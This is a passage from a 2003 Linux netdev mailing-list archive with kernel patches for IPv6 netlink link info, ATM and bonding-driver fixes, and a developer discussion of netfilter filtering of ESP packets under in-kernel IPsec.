array[i++] = cnf->hop_limit; + array[i++] = cnf->mtu6; + array[i++] = cnf->accept_ra; + array[i++] = cnf->accept_redirects; + array[i++] = cnf->autoconf; + array[i++] = cnf->dad_transmits; + array[i++] = cnf->rtr_solicits; + array[i++] = cnf->rtr_solicit_interval; + array[i++] = cnf->rtr_solicit_delay; +#ifdef CONFIG_IPV6_PRIVACY + array[i++] = cnf->use_tempaddr; + array[i++] = cnf->temp_valid_lft; + array[i++] = cnf->temp_prefered_lft; + array[i++] = cnf->regen_max_retry; + array[i++] = cnf->max_desync_factor; +#endif + return i; /* actual number of elements */ +} + +static int inet6_fill_ifinfo(struct sk_buff *skb, struct net_device *dev, + struct inet6_dev *idev, + int type, u32 pid, u32 seq) +{ + int num_items; + int *array = NULL; + struct ifinfomsg *r; + struct nlmsghdr *nlh; + unsigned char *b = skb->tail; + struct rtattr *subattr; + + nlh = NLMSG_PUT(skb, pid, seq, type, sizeof(*r)); + if (pid) nlh->nlmsg_flags |= NLM_F_MULTI; + r = NLMSG_DATA(nlh); + r->ifi_family = AF_INET6; + r->ifi_type = dev->type; + r->ifi_index = dev->ifindex; + r->ifi_flags = dev->flags; + r->ifi_change = 0; + if (!netif_running(dev) || !netif_carrier_ok(dev)) + r->ifi_flags &= ~IFF_RUNNING; + else + r->ifi_flags |= IFF_RUNNING; + + RTA_PUT(skb, IFLA_IFNAME, strlen(dev->name)+1, dev->name); + + subattr = (struct rtattr*)skb->tail; + + RTA_PUT(skb, IFLA_PROTINFO, 0, NULL); + RTA_PUT(skb, IFLA_INET6_FLAGS, sizeof(__u32), &idev->if_flags); + + /* + * using sizeof(struct) can be wrong due to padding, but it is the + * the maximum possible number of items, which gets corrected later. + */ + num_items = sizeof(struct ipv6_devconf) / sizeof(*array); + if ((array = kmalloc(num_items, GFP_KERNEL)) == NULL) + goto rtattr_failure; + num_items = ipv6_store_devconf(&idev->cnf, array); + RTA_PUT(skb, IFLA_INET6_CONF, num_items * sizeof(*array), array); + /* XXX stats/MC not implemented */ + subattr->rta_len = skb->tail - (u8*)subattr; + + nlh->nlmsg_len = skb->tail - b; + kfree(array); + return skb->len; + +nlmsg_failure: +rtattr_failure: + if (array) + kfree(array); + skb_trim(skb, b - skb->data); + return -1; +} + +static int inet6_dump_ifinfo(struct sk_buff *skb, struct netlink_callback *cb) +{ + int idx, err; + int s_idx = cb->args[0]; + struct net_device *dev; + struct inet6_dev *idev; + + read_lock(&dev_base_lock); + for (dev=dev_base, idx=0; dev; dev = dev->next, idx++) { + if (idx < s_idx) + continue; + if ((idev = in6_dev_get(dev)) == NULL) + continue; + err = inet6_fill_ifinfo(skb, dev, idev, RTM_NEWLINK, + NETLINK_CB(cb->skb).pid, cb->nlh->nlmsg_seq); + in6_dev_put(idev); + if (err <= 0) + break; + } + read_unlock(&dev_base_lock); + cb->args[0] = idx; + + return skb->len; +} + static struct rtnetlink_link inet6_rtnetlink_table[RTM_MAX - RTM_BASE + 1] = { + [RTM_GETLINK - RTM_BASE] = { .dumpit = inet6_dump_ifinfo, }, [RTM_NEWADDR - RTM_BASE] = { .doit = inet6_rtm_newaddr, }, [RTM_DELADDR - RTM_BASE] = { .doit = inet6_rtm_deladdr, }, [RTM_GETADDR - RTM_BASE] = { .dumpit = inet6_dump_ifaddr, }, From davem@redhat.com Tue Jul 29 22:26:08 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 29 Jul 2003 22:26:12 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6U5Q7Fl017722 for ; Tue, 29 Jul 2003 22:26:08 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id WAA01359; Tue, 29 Jul 2003 22:22:43 -0700 Date: Tue, 29 Jul 2003 22:22:42 -0700 From: "David S. Miller" To: Anton Blanchard Cc: netdev@oss.sgi.com, miltonm@bga.com Subject: Re: [PATCH] fix NAPI race Message-Id: <20030729222242.4ba89d51.davem@redhat.com> In-Reply-To: <20030729060509.GB13227@krispykreme> References: <20030729060509.GB13227@krispykreme> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4371 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Tue, 29 Jul 2003 16:05:09 +1000 Anton Blanchard wrote: > Milton and I debugged an oops where we did list_del on a poisoned list > entry. It turns out there is nothing to order between list_del on > poll_list and the clear_bit that serialises list_add. Applied, thanks Anton. From davem@redhat.com Tue Jul 29 22:34:29 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 29 Jul 2003 22:34:32 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6U5YSFl018126 for ; Tue, 29 Jul 2003 22:34:29 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id WAA01403; Tue, 29 Jul 2003 22:30:40 -0700 Date: Tue, 29 Jul 2003 22:30:39 -0700 From: "David S. Miller" To: chas3@users.sourceforge.net Cc: chas@cmf.nrl.navy.mil, mitch@sfgoth.com, netdev@oss.sgi.com Subject: Re: [atmdrvr zatm] Remove obsolete EXACT_TS support Message-Id: <20030729223039.15ee3896.davem@redhat.com> In-Reply-To: <200307291717.h6THHosG027846@ginger.cmf.nrl.navy.mil> References: <20030728071323.GT32831@gaz.sfgoth.com> <200307291717.h6THHosG027846@ginger.cmf.nrl.navy.mil> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4372 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Tue, 29 Jul 2003 13:15:09 -0400 chas williams wrote: > dave, please apply the following patch (hopefully one will arrive > shortly that removes cli() et al from zatm as well): Applied to 2.6.x, thanks. From davem@redhat.com Tue Jul 29 22:35:26 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 29 Jul 2003 22:35:30 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6U5ZPFl018234 for ; Tue, 29 Jul 2003 22:35:25 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id WAA01430; Tue, 29 Jul 2003 22:31:57 -0700 Date: Tue, 29 Jul 2003 22:31:57 -0700 From: "David S. Miller" To: chas williams Cc: bellucda@tiscali.it, netdev@oss.sgi.com Subject: Re: [PATCH] replace current->state = x with set_current_state(x) in drivers/atm/* [2.6.0-test1] Message-Id: <20030729223157.5a829a64.davem@redhat.com> In-Reply-To: <200307291745.h6THjIsG028329@ginger.cmf.nrl.navy.mil> References: <200307252042.35832.bellucda@tiscali.it> <200307291745.h6THjIsG028329@ginger.cmf.nrl.navy.mil> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4373 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Tue, 29 Jul 2003 13:42:36 -0400 chas williams wrote: > dave, please apply this to the 2.6 tree. Done, thanks. From davem@redhat.com Tue Jul 29 22:37:06 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 29 Jul 2003 22:37:09 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6U5b5Fl018710 for ; Tue, 29 Jul 2003 22:37:05 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id WAA01446; Tue, 29 Jul 2003 22:33:27 -0700 Date: Tue, 29 Jul 2003 22:33:27 -0700 From: "David S. Miller" To: chas3@users.sourceforge.net Cc: chas@cmf.nrl.navy.mil, netdev@oss.sgi.com Subject: Re: [PATCH][ATM][2.4] export try_atm_clip_ops not atm_clip_ops_mutex Message-Id: <20030729223327.5575a154.davem@redhat.com> In-Reply-To: <200307291759.h6THxlsG028613@ginger.cmf.nrl.navy.mil> References: <200307291759.h6THxlsG028613@ginger.cmf.nrl.navy.mil> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4374 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Tue, 29 Jul 2003 13:57:05 -0400 chas williams wrote: > please apply to 2.4 -- thanks > > [atm]: export try_atm_clip_ops not atm_clip_ops_mutex Applied, will go into 2.4.23-preX Thanks. From hch@infradead.org Wed Jul 30 02:24:47 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 30 Jul 2003 02:24:54 -0700 (PDT) Received: from phoenix.infradead.org (pub234.cambridge.redhat.com [213.86.99.234] (may be forged)) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6U9OjFl001636 for ; Wed, 30 Jul 2003 02:24:46 -0700 Received: from hch by phoenix.infradead.org with local (Exim 4.10) id 19hnCH-00012C-00; Wed, 30 Jul 2003 10:24:37 +0100 Date: Wed, 30 Jul 2003 10:24:37 +0100 From: Christoph Hellwig To: "David S. Miller" Cc: chas3@users.sourceforge.net, chas@cmf.nrl.navy.mil, netdev@oss.sgi.com Subject: Re: [PATCH][ATM][2.4] export try_atm_clip_ops not atm_clip_ops_mutex Message-ID: <20030730102437.B3901@infradead.org> References: <200307291759.h6THxlsG028613@ginger.cmf.nrl.navy.mil> <20030729223327.5575a154.davem@redhat.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <20030729223327.5575a154.davem@redhat.com>; from davem@redhat.com on Tue, Jul 29, 2003 at 10:33:27PM -0700 X-archive-position: 4375 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: hch@infradead.org Precedence: bulk X-list: netdev On Tue, Jul 29, 2003 at 10:33:27PM -0700, David S. Miller wrote: > On Tue, 29 Jul 2003 13:57:05 -0400 > chas williams wrote: > > > please apply to 2.4 -- thanks > > > > [atm]: export try_atm_clip_ops not atm_clip_ops_mutex > > Applied, will go into 2.4.23-preX Hmm, this looks like a fix for modular compilation and should probably go into 2.4.22.. From willy@w.ods.org Wed Jul 30 07:07:36 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 30 Jul 2003 07:07:45 -0700 (PDT) Received: from www.home.local (willy.net1.nerim.net [62.212.114.60]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6UE7YFl024558 for ; Wed, 30 Jul 2003 07:07:36 -0700 Received: from alpha.home.local (alpha [10.0.1.2]) by www.home.local (8.12.1/8.12.1) with ESMTP id h6UE70pn030528; Wed, 30 Jul 2003 16:07:01 +0200 Received: (from willy@localhost) by alpha.home.local (8.12.4/8.12.1) id h6UE6w5V014473; Wed, 30 Jul 2003 16:06:58 +0200 Date: Wed, 30 Jul 2003 16:06:58 +0200 From: Willy Tarreau To: davem@redhat.com, jgarzik@pobox.com, marcelo@conectiva.com.br Cc: netdev@oss.sgi.com, bonding-devel@lists.sourceforge.net, linux-kernel@vger.kernel.org Subject: [PATCH] 2.4.22-pre9-bk : bonding bug fixes Message-ID: <20030730140658.GA14437@alpha.home.local> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.4i X-archive-position: 4376 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: willy@w.ods.org Precedence: bulk X-list: netdev Hi Marcelo, David, Jeff... there are still a few bugs in the current bonding driver. I've reported them several times now, but perhaps not at the right places... So : - the first patch fixes a typo in the MODULE_PARM_DESC - the second one adds a comment and a warning around some code I don't understand, but which cannot be executed. It's within function bond_xmit_activebackup, and only executes if bond->mode != ACTIVEBACKUP.... - now the last one fixes a kernel panic due to a cheap hack which was introduced to determine the source IP address to use with ARP checks. It takes the first address of the first slave, and puts a lock on it. If there's no address, its ip_ptr is NULL, and the kernel panics while trying to get the lock. You can reproduce it easily this way : # modprobe eth0 # modprobe bonding mode=active-backup miimon=1000 # ip link set bond0 up # ifenslave bond0 eth0 => kernel panic ! Now here are the patches. I really hope to get them into 2.4.22, since I'm a bit fed up with my server panicing each time I try a vanilla new kernel which I forget to patch... Cheers, Willy ======== first one ========== --- linux-2.4.22-pre9-bk/drivers/net/bonding/bond_main.c Wed Jul 30 09:49:48 2003 +++ linux-2.4.22-pre9-bk-bond/drivers/net/bonding/bond_main.c Wed Jul 30 15:09:15 2003 @@ -524,7 +524,7 @@ MODULE_PARM(miimon, "i"); MODULE_PARM_DESC(miimon, "Link check interval in milliseconds"); MODULE_PARM(use_carrier, "i"); -MODULE_PARM_DESC(use_carrier, "Use netif_carrier_ok (vs MII ioctls) in miimon; 09 for off, 1 for on (default)"); +MODULE_PARM_DESC(use_carrier, "Use netif_carrier_ok (vs MII ioctls) in miimon; 0 for off, 1 for on (default)"); MODULE_PARM(mode, "s"); MODULE_PARM_DESC(mode, "Mode of operation : 0 for round robin, 1 for active-backup, 2 for xor"); MODULE_PARM(arp_interval, "i"); ======== second one ========== --- linux-2.4.22-pre9-bk/drivers/net/bonding/bond_main.c Wed Jul 30 15:12:11 2003 +++ linux-2.4.22-pre9-bk-bond/drivers/net/bonding/bond_main.c Wed Jul 30 15:31:01 2003 @@ -3281,6 +3281,19 @@ memcpy(&my_ip, the_ip, 4); } + /* w.tarreau - 2003/07/30 + * I don't understand the logic here : + * - this code should be run only if we're NOT in active-backup mode, which + * is the only mode for which this function will be called. + * - the comment says the code tries to avoid sending broadcasts for ARP + * requests when the destination is known. This is obviously wrong since + * it will prevent you from changing the dead equipment you were checking + * without reloading the bonding driver ! High availability and low + * network usage never mix well ... + */ +#warning "This code may need a fix !" +#ifdef HOW_CAN_THIS_BE_CALLED + /* if we are sending arp packets and don't know * the target hw address, save it so we don't need * to use a broadcast address. @@ -3302,6 +3315,7 @@ memcpy(arp_target_hw_addr, eth_hdr->h_dest, ETH_ALEN); } } +#endif read_lock(&bond->lock); ========= third one ========== --- linux-2.4.22-pre9-bk/drivers/net/bonding/bond_main.c Wed Jul 30 15:09:15 2003 +++ linux-2.4.22-pre9-bk-bond/drivers/net/bonding/bond_main.c Wed Jul 30 15:12:11 2003 @@ -1594,11 +1594,14 @@ #endif bond_set_slave_inactive_flags(new_slave); } - read_lock_irqsave(&(((struct in_device *)slave_dev->ip_ptr)->lock), rflags); - ifap= &(((struct in_device *)slave_dev->ip_ptr)->ifa_list); - ifa = *ifap; - my_ip = ifa->ifa_address; - read_unlock_irqrestore(&(((struct in_device *)slave_dev->ip_ptr)->lock), rflags); + if (((struct in_device *)slave_dev->ip_ptr) != NULL) { + read_lock_irqsave(&(((struct in_device *)slave_dev->ip_ptr)->lock), rflags); + ifap= &(((struct in_device *)slave_dev->ip_ptr)->ifa_list); + ifa = *ifap; + if (ifa != NULL) + my_ip = ifa->ifa_address; + read_unlock_irqrestore(&(((struct in_device *)slave_dev->ip_ptr)->lock), rflags); + } /* if there is a primary slave, remember it */ if (primary != NULL) { From laforge@netfilter.org Wed Jul 30 07:27:33 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 30 Jul 2003 07:27:41 -0700 (PDT) Received: from coruscant.gnumonks.org (mail@coruscant.franken.de [193.174.159.226]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6UERUFl028044 for ; Wed, 30 Jul 2003 07:27:32 -0700 Received: from [192.168.200.2] (helo=sunbeam.gnumonks.org) by coruscant.gnumonks.org with esmtp (TLSv1:DES-CBC3-SHA:168) (Exim 4.20) id 19hrvL-0001ts-RA; Wed, 30 Jul 2003 16:27:28 +0200 Received: from laforge by sunbeam.gnumonks.org with local (Exim 4.20) id 19hrsB-0001I7-Gi; Wed, 30 Jul 2003 16:24:11 +0200 Date: Wed, 30 Jul 2003 16:24:11 +0200 From: Harald Welte To: netfilter-devel@lists.netfilter.org Cc: netfilter@lists.netfilter.org, netdev@oss.sgi.com Subject: Re: port-based filtering of ESP packets with in-kernel IPsec? Message-ID: <20030730142411.GD4553@sunbeam.de.gnumonks.org> Mail-Followup-To: Harald Welte , netfilter-devel@lists.netfilter.org, netfilter@lists.netfilter.org, netdev@oss.sgi.com References: <1059540296.16545.305.camel@k7.localnet> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="kvUQC+jR9YzypDnK" Content-Disposition: inline In-Reply-To: <1059540296.16545.305.camel@k7.localnet> X-Operating-system: Linux sunbeam 2.6.0-test1-nftest X-Date: Today is Sweetmorn, the 65th day of Confusion in the YOLD 3169 User-Agent: Mutt/1.5.4i X-archive-position: 4377 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: laforge@netfilter.org Precedence: bulk X-list: netdev --kvUQC+jR9YzypDnK Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Tue, Jul 29, 2003 at 11:44:57PM -0500, Rick Kennell wrote: > I asked about this last week in the general netfilter list, but it > appears that most folks are still using FreeS/WAN for IPsec. yes, most people will use a stable kernel rather than a development one ;) > I'm using the in-kernel IPsec and want to be able to filter ESP packets > based on protocol or port number. These values are encapsulated in the > ESP payload and are unavailable to netfilter. If I were using > FreeS/WAN, I could use standard netfilter techniques on the ipsec0 > device. With the in-kernel IPsec, there's no extra pseudo-device with > which to examine unencapsulated ESP packets. true. > It looks too me like netfilter sees the packet as ESP in all chains in > all tables. (I'd be delighted to be corrected.) I haven't investigated the new in-kernel ESP implementation that far, but your observation sounds reasonable (although I don't say this is the desired behaviour). > Since ESP packets that reach the mangle INPUT chain are destined for a > local process, why not unencapsulate them just before that point? =20 Because NF_IP_LOCAL_IN (like all other hooks) are in the layer 3 stack, and decapsulating ESP is inside a layer 4 protocol - thus it happens after the ip stack has handed it over to the esp4 protocol engine. > It might still be nice to have an indication that this was once an ESP > packet for filtering, but that could be done by setting a mark in the > mangle PREROUTING chain. no. My preferred solution was something like adding a netfilter hook to the xfrm4 engine, exactly after decapsulation / decryption of one layer, i.e. after xfrm_type.input was called.=20 iptables could then register the INPUT chain (or probably even a seperate POSTXFRM chain) in order to filter on the respective packets. > I realize that this would probably require some heavy lifting in the > network layer to accomplish this nesting of functionality. yes, this is why this should be discussed on the netdev list (Cc'ed). I think this needs to be sorted out before 2.6.0-final will be released. Any comments are appreciated. > Am I missing something obvious? --=20 - Harald Welte http://www.netfilter.org/ =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D "Fragmentation is like classful addressing -- an interesting early architectural error that shows how much experimentation was going on while IP was being designed." -- Paul Vixie --kvUQC+jR9YzypDnK Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.2 (GNU/Linux) iD8DBQE/J9ULXaXGVTD0i/8RApDKAJ9Khp7Ne+MXX8f1gKyXpIwDUWegdgCfYY6g xKhlDsfWItUGVBtroYz8EOs= =qqO8 -----END PGP SIGNATURE----- --kvUQC+jR9YzypDnK-- From chas@locutus.cmf.nrl.navy.mil Wed Jul 30 07:35:19 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 30 Jul 2003 07:35:25 -0700 (PDT) Received: from ginger.cmf.nrl.navy.mil (ginger.cmf.nrl.navy.mil [134.207.10.161]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6UEZIFl028905 for ; Wed, 30 Jul 2003 07:35:19 -0700 Received: from locutus.cmf.nrl.navy.mil (locutus.cmf.nrl.navy.mil [134.207.10.66]) by ginger.cmf.nrl.navy.mil (8.12.7/8.12.7) with ESMTP id h6UEZDsG010062; Wed, 30 Jul 2003 10:35:13 -0400 (EDT) Message-Id: <200307301435.h6UEZDsG010062@ginger.cmf.nrl.navy.mil> To: Christoph Hellwig cc: "David S. Miller" , netdev@oss.sgi.com Reply-To: chas3@users.sourceforge.net Subject: Re: [PATCH][ATM][2.4] export try_atm_clip_ops not atm_clip_ops_mutex In-reply-to: Your message of "Wed, 30 Jul 2003 10:24:37 BST." <20030730102437.B3901@infradead.org> Date: Wed, 30 Jul 2003 10:32:31 -0400 From: chas williams X-Spam-Score: () hits=-0.9 X-Virus-Scanned: NAI Completed X-Scanned-By: MIMEDefang 2.30 (www . roaringpenguin . com / mimedefang) X-archive-position: 4378 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: chas@cmf.nrl.navy.mil Precedence: bulk X-list: netdev In message <20030730102437.B3901@infradead.org>,Christoph Hellwig writes: >On Tue, Jul 29, 2003 at 10:33:27PM -0700, David S. Miller wrote: >> On Tue, 29 Jul 2003 13:57:05 -0400 >> chas williams wrote: >> >> > please apply to 2.4 -- thanks >> > >> > [atm]: export try_atm_clip_ops not atm_clip_ops_mutex >> >> Applied, will go into 2.4.23-preX > >Hmm, this looks like a fix for modular compilation and should >probably go into 2.4.22.. i would prefer it to be applied to 2.4.22 but if it cant be done it cant be done. i am not pressed. From aj@dungeon.inka.de Wed Jul 30 07:51:01 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 30 Jul 2003 07:51:08 -0700 (PDT) Received: from mail.inka.de (mail@quechua.inka.de [193.197.184.2]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6UEoxFl032217 for ; Wed, 30 Jul 2003 07:51:00 -0700 Received: from dungeon.inka.de (uucp@[127.0.0.1]) by mail.inka.de with uucp (rmailwrap 0.5) id 19hsI5-0003sQ-00; Wed, 30 Jul 2003 16:50:57 +0200 Received: from [192.168.3.1] (unknown [192.168.3.1]) by dungeon.inka.de (Postfix) with ESMTP id E5CC212E4C7; Wed, 30 Jul 2003 16:50:54 +0200 (CEST) Subject: Re: port-based filtering of ESP packets with in-kernel IPsec? From: Andreas Jellinghaus To: Harald Welte Cc: netfilter-devel@lists.netfilter.org, netfilter@lists.netfilter.org, netdev@oss.sgi.com In-Reply-To: <20030730142411.GD4553@sunbeam.de.gnumonks.org> References: <1059540296.16545.305.camel@k7.localnet> <20030730142411.GD4553@sunbeam.de.gnumonks.org> Content-Type: text/plain Message-Id: <1059576701.4586.20.camel@simulacron> Mime-Version: 1.0 X-Mailer: Ximian Evolution 1.4.3 Date: 30 Jul 2003 16:51:41 +0200 Content-Transfer-Encoding: 7bit X-archive-position: 4379 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: aj@dungeon.inka.de Precedence: bulk X-list: netdev Hi, if you are using ipsec from kernel 2.6.* there is no "ipsec0" interface, and thus using netfilter isn't as easy as it was with freeswan. three ways to solve the problem, only tried the first one so far: 1.) configure ipsec in tunnel mode, add your tunnel ip to the outgoing interface, change the default route to set the source ip to the tunnel ip. note: there is no routing step after encapsulating a packet with ipsec, there was one with freeswan, so this is different. 2.) set a fwmark on an esp packet, it should be there after unpacking/decryption. didn't try this one. 3.) do not use the build in tunneling. use an explicit ipip tunnel. that way you have the interface, can use it in netfilter, can route into it, and the interface will set the right source address. [netfilter] incoming encrypted packets are seen as ESP/AH in INPUT and then as decrypted packet in INPUT or FORWARD. outgoing packets are only seen as ESP in OUTPUT. > > Since ESP packets that reach the mangle INPUT chain are destined for a > > local process, why not unencapsulate them just before that point? INPUT only means the ESP will be decrypted/unecapsulated. after that the decrypted packet will show up in INPUT or FORWARD. > no. My preferred solution was something like adding a netfilter hook to > the xfrm4 engine, exactly after decapsulation / decryption of one layer, > i.e. after xfrm_type.input was called. > > iptables could then register the INPUT chain (or probably even a > seperate POSTXFRM chain) in order to filter on the respective packets. you can already filter incoming packets. The problem is you don't know if they came in that way they look now, or if they came in via ESP packets and got decrypted. maybe decryption/unencapsulating could leave a mark on the packet, so we know packets without that mark came in without ipsec and are bad / attempts to access resources without ipsec? (maybe fwmark works on that. or an explicit ipip tunnel, so you have "ipip0" or something as incoming interface). > Any comments are appreciated. Regards, Andreas From laforge@netfilter.org Wed Jul 30 08:20:16 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 30 Jul 2003 08:20:23 -0700 (PDT) Received: from coruscant.gnumonks.org (mail@coruscant.franken.de [193.174.159.226]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6UFKFFl002004 for ; Wed, 30 Jul 2003 08:20:15 -0700 Received: from [192.168.200.2] (helo=sunbeam.gnumonks.org) by coruscant.gnumonks.org with esmtp (TLSv1:DES-CBC3-SHA:168) (Exim 4.20) id 19hskP-0002ur-0B; Wed, 30 Jul 2003 17:20:14 +0200 Received: from laforge by sunbeam.gnumonks.org with local (Exim 4.20) id 19hshB-0001N1-To; Wed, 30 Jul 2003 17:16:53 +0200 Date: Wed, 30 Jul 2003 17:16:53 +0200 From: Harald Welte To: Andreas Jellinghaus Cc: netfilter-devel@lists.netfilter.org, netfilter@lists.netfilter.org, netdev@oss.sgi.com Subject: Re: port-based filtering of ESP packets with in-kernel IPsec? Message-ID: <20030730151653.GB5161@sunbeam.de.gnumonks.org> Mail-Followup-To: Harald Welte , Andreas Jellinghaus , netfilter-devel@lists.netfilter.org, netfilter@lists.netfilter.org, netdev@oss.sgi.com References: <1059540296.16545.305.camel@k7.localnet> <20030730142411.GD4553@sunbeam.de.gnumonks.org> <1059576701.4586.20.camel@simulacron> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="WYTEVAkct0FjGQmd" Content-Disposition: inline In-Reply-To: <1059576701.4586.20.camel@simulacron> X-Operating-system: Linux sunbeam 2.6.0-test1-nftest X-Date: Today is Sweetmorn, the 65th day of Confusion in the YOLD 3169 User-Agent: Mutt/1.5.4i X-archive-position: 4380 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: laforge@netfilter.org Precedence: bulk X-list: netdev --WYTEVAkct0FjGQmd Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Wed, Jul 30, 2003 at 04:51:41PM +0200, Andreas Jellinghaus wrote: =20 > [netfilter] > incoming encrypted packets are seen as ESP/AH in INPUT > and then as decrypted packet in INPUT or FORWARD. ok, great. > outgoing packets are only seen as ESP in OUTPUT. this could be a problem. I think there is quite a number of users who want to impose packet filtering on outgoing locally-originated packets... and obviously you want to do that at some time _before_ you hide everything behind crypto.. > you can already filter incoming packets. The problem is you > don't know if they came in that way they look now, or if they > came in via ESP packets and got decrypted. >=20 > maybe decryption/unencapsulating could leave a mark on the > packet, so we know packets without that mark came in without > ipsec and are bad / attempts to access resources without ipsec? > (maybe fwmark works on that. or an explicit ipip tunnel, so you > have "ipip0" or something as incoming interface). This sounds a bit like the existing problem with bridgewalling. They also have no idea of where the packet originally came from (at least before the physdev stuff was introduced as solution to this). --=20 - Harald Welte http://www.netfilter.org/ =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D "Fragmentation is like classful addressing -- an interesting early architectural error that shows how much experimentation was going on while IP was being designed." -- Paul Vixie --WYTEVAkct0FjGQmd Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.2 (GNU/Linux) iD8DBQE/J+FlXaXGVTD0i/8RArRjAJ9fqF6G+ARS6eXqnPYBIDyuFftoXQCdH2vT 2xabS84rlPcSCPbOyNMpYNI= =rQbl -----END PGP SIGNATURE----- --WYTEVAkct0FjGQmd-- From amir.noam@intel.com Wed Jul 30 10:07:37 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 30 Jul 2003 10:07:42 -0700 